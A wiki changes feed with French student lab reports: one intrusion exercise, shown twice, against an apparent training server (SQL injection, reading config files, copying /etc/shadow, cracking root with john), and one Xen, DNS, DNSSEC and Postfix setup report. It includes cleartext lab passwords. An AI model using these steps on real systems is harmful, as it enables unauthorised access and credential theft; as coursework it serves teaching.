  sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
&lt;br /&gt;
Maintenant que nous avons un dictionnaire adéquat, nous pouvons nous consacrer au craquage du mot de passe pleinement. Nous allons regrouper ''passwd_rex'' et ''shadow_rex'' avec la commande suivante:&lt;br /&gt;
&lt;br /&gt;
  unshadow /home/passwd_rex /home/shadow_rex | head &amp;gt; password&lt;br /&gt;
&lt;br /&gt;
Puis utiliser la force brute avec la commande:&lt;br /&gt;
&lt;br /&gt;
  john -w:dico password&lt;br /&gt;
&lt;br /&gt;
On obtient alors le mot de passe ''root'' suivant: ''fortfort''&lt;br /&gt;
&lt;br /&gt;
On peut alors se connecter en SSH:&lt;br /&gt;
&lt;br /&gt;
  ssh root@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Puis ajouter un fichier:&lt;br /&gt;
&lt;br /&gt;
  touch Normand_Claudel_grp12&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54118</id>
		<title>TP sysres IMA5sc 2020/2021 G12</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54118"/>
				<updated>2020-11-30T16:07:04Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA Quentin Normand / Maxime Claudel - truffe&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est de se connecter en ssh en tant que root sur le serveur honey.plil.info.&lt;br /&gt;
&lt;br /&gt;
Pour cela, dans un navigateur web, on examine l'application, et on tente une injection SQL dans le champ identifiant via la commande:&lt;br /&gt;
&lt;br /&gt;
  'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
On obtient ainsi une liste d'utilisateurs avec les mots de passe associés.&lt;br /&gt;
&lt;br /&gt;
On peut donc désormais se connecter à l'application avec l'identifiant ''admin'' et son mot de passe ''jesuislechef''.&lt;br /&gt;
&lt;br /&gt;
Par la suite, on a pu voir les différents manuels, et en ajouter un avec le chemin /etc/phpmyadmin/config-db. En téléchargeant le fichier nouvellement créé, on a pu récupérer le mot de passe ''gencovid19''.&lt;br /&gt;
En se connectant en ''root'' avec ce mot de passe à phpmyadmin on a pu rentrer dans la table ''users'' et récupérer le login ''rex'' et le mot de passe associé ''plainpassword''.&lt;br /&gt;
&lt;br /&gt;
On a donc pu se connecter en SSH au serveur:&lt;br /&gt;
&lt;br /&gt;
  ssh rex@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
On a ensuite utilisé les commandes suivantes pour récupérer les fichiers /etc/passwd et /etx/shadow:&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/shadow shadow_rex&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/passwd passwd_rex&lt;br /&gt;
&lt;br /&gt;
Ces deux fichiers vont nous permettre de récupérer le mot de passe ''root'' par force brute via l'utilitaire ''johnthereaper''.&lt;br /&gt;
&lt;br /&gt;
Cependant, grâce aux indications données, nous pouvons limité la force brute aux mots de passe formé de 2chaines identiques de 4 caractères. On va donc dans un premier temps créer un dictionnaire de mots de 4 caractères:&lt;br /&gt;
&lt;br /&gt;
  crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
&lt;br /&gt;
Puis le transformé en dictionnaire de mots de 8 caractères en doublant les mots présents:&lt;br /&gt;
&lt;br /&gt;
  sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
&lt;br /&gt;
Maintenant que nous avons un dictionnaire adéquat, nous pouvons nous consacrer au craquage du mot de passe pleinement. Nous allons regrouper ''passwd_rex'' et ''shadow_rex'' avec la commande suivante:&lt;br /&gt;
&lt;br /&gt;
  unshadow /home/passwd_rex /home/shadow_rex | head &amp;gt; password&lt;br /&gt;
&lt;br /&gt;
Puis utiliser la force brute avec la commande:&lt;br /&gt;
&lt;br /&gt;
  john -w:dico password&lt;br /&gt;
&lt;br /&gt;
On obtient alors le mot de passe ''root'' suivant: ''fortfort''&lt;br /&gt;
&lt;br /&gt;
On peut alors se connecter en SSH:&lt;br /&gt;
&lt;br /&gt;
  ssh root@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Puis ajouter un fichier:&lt;br /&gt;
&lt;br /&gt;
  touch Normand_Claudel_grp12&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54024</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54024"/>
				<updated>2020-11-27T19:35:25Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Description */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG|1000px|thumb|left|Architecture du réseau]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le problème est que si on regarde le réseau n'est pas vraiment redondant : &lt;br /&gt;
&lt;br /&gt;
- Si on a une coupure de courant tout le réseau s'effondrent, dans l'idéale, il faudrait des onduleurs et un réseau électrique séparé pour la Baie1 et la Baie2/3&lt;br /&gt;
&lt;br /&gt;
- Le réseau ADSL n'est pas fonctionnelle donc si on perd le réseau Polytech on n'as plus accès aux machines.&lt;br /&gt;
&lt;br /&gt;
- Toutes les VM et les sites WEB sont sur la baie3 qui héberge le serveur de virtualisation Capbreton, si on perd la baie3 tout le système tombe.&lt;br /&gt;
&lt;br /&gt;
- Pour finir dans l'idéale les deux bais devrais être dans des bâtiments séparer en cas d'incendie, on risque de perdre les deux bais.&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
Grace aux efforts de monsieur Xavier Redon pour permettre de joindre Capbreton a distance pendant le confinement avec la commande 'SSH'.&lt;br /&gt;
&lt;br /&gt;
On peux donc maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. &lt;br /&gt;
&lt;br /&gt;
Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. &lt;br /&gt;
&lt;br /&gt;
Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveurs DNS configurer on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. &lt;br /&gt;
&lt;br /&gt;
Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK).&lt;br /&gt;
&lt;br /&gt;
Puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
